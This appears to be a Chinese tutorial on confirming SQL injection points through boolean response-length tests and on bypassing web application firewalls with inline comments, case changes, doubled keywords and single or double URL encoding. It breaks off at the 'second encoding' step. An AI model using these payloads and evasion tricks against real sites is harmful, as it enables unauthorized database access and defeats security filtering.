确认注入点的方式
在黑盒的角度下,想确认一个接口有无SQL注入,有很多种确认方式,下面列举两种常见:
传统方式
id=1' and 1=1; #①
id=1' and 1=2; #②
通过查看 ①与② 的返回包长度,如果①与② 的返回包长度不同 那么有注入。
内联注释方式
现在很多waf都拦截 1=1 、1=2这种敏感符号了,采用内联注入有可能可以绕过waf,进行注入点确认;
id=1 #①
id=1' /*!and*/ 1=1 #②
id=1' /*!and*/ 1=2 #③
通过查看 ①与② 与③的返回包长度,如果①与② 的返回包长度相同,①与③ 的返回包长度不相同 那么有注入。
常见绕过waf的操作
大小写绕过
and
改成如下形式:
And
aNd
ANd
...
双写绕过
and
改成如下形式:
anandd
andandandand
aaandnnddd
...
编码绕过
1' and 1=1
#转成URL-encode格式
%31%27%20%61%6E%64%20%31%3D%31
感谢大佬浮萍(https://fuping.site/)给我提供的工具。
或者御剑也能做转换:
全编码两次的作用:
如果上面的操作无效,是因为服务器会自动对URL进行一次URL编码,所以需要把关键字编码两次。
and
%61%6e%64
%25%36%31%25%36%65%25%36%34
步骤如下:
第一次编码:
第二次编码: